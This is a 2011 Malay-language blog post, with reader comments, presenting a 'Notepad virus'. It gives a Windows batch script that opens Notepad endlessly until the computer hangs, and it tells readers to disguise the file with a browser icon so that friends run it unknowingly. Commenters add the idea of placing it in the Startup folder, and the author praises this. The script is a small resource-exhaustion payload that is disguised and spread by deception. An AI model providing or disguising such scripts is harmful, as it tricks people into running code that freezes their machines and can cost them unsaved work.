Monday, 11 July 2011

Virus Notepad

Anda semua tahu bukan apa itu NOTEPAD, siapa tak tahu sila rujuk sini >LINK<. Kali ne kita akan gunakan NOTEPAD untuk membuat VIRUS. Bukanlah VIRUS bahaya manapun cuma VIRUS yang akan membuat APPLICATION NOTEPAD ini terbuka secara sendirinya secara berterusan sehingga komputer anda hang.




Cara melakukannya senang saja.


1. First buka NOTEPAD anda, ada yang tak tahu? Rujuk Sini >LINK<

2. Taip code ini ke dalam NOTEPAD dan save as namafail.BAT


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

3. Tukar icon file kepada icon yang susah untuk dikesan oleh kawan anda, contoh guna icon browser. Jadi apabila dia klik icon yang sudah kamu palsukan tu, dia pasti akan terkejut dengan apa yang terjadi...hehe

Cara menukar icon file boleh dirujuk disini >LINK<

Kalau anda ingin mencuba sendiri juga boleh, cuba klik file BAT yang ada buat tu dan lihat hasilnya. Jangan bimbang kerana komputer anda tidak akan rosak cuma hang sebentar kemudian lepas RESTART ok lah semula.

p/s : teruskan bermain...

9 comments:

zeeck said...

waaaah ini menarik!! XD

da wat file nie pastu masuk kan kat startup~ huhuhu

muz said...

@zeeck
wah bagus sangat yang ko wat tu masukkan kat startup...hehe

vampire's lovex said...

hahahha..main lagi..main...hihi..

buat pedajal kat mmber pon best gak kan? hahah

oPiE iSa said...

@_@

Anak Wak Mail said...

apa fungsi benda ni??

-aku si buta IT-

muz said...

vampire's lovex : Permainan baru bermula...haha



oPiE iSa : Ya opie?



Anak Wak Mail : Bila ko dah buat benda ne, cuba ko klik. Benda ne berfungsi untuk membuka notepad dalam kuantiti yang banyak secara berterusan, jadi apabila notepad dibuka dalam kuantiti yang banyak secara berterusan, ia akan menggunakan RAM yang tinggi, hal ini akan menyebabkan komputer menjadi hang, cara penyelesaian RESTART saja komputer.

Syarafi[skyforce331] said...

jom pakat2 pekena org...mintak muz tambah lg yg lain pulak..hehe

Syarafi[skyforce331] said...

camana nk tuka icon..hehe

muz said...

@Syarafi[skyforce331]
Hehe...teruskan bermain

rujuk cara tukar icon di sini

http://komputer-milikku.blogspot.com/2011/06/trik-buat-shutdown-error.html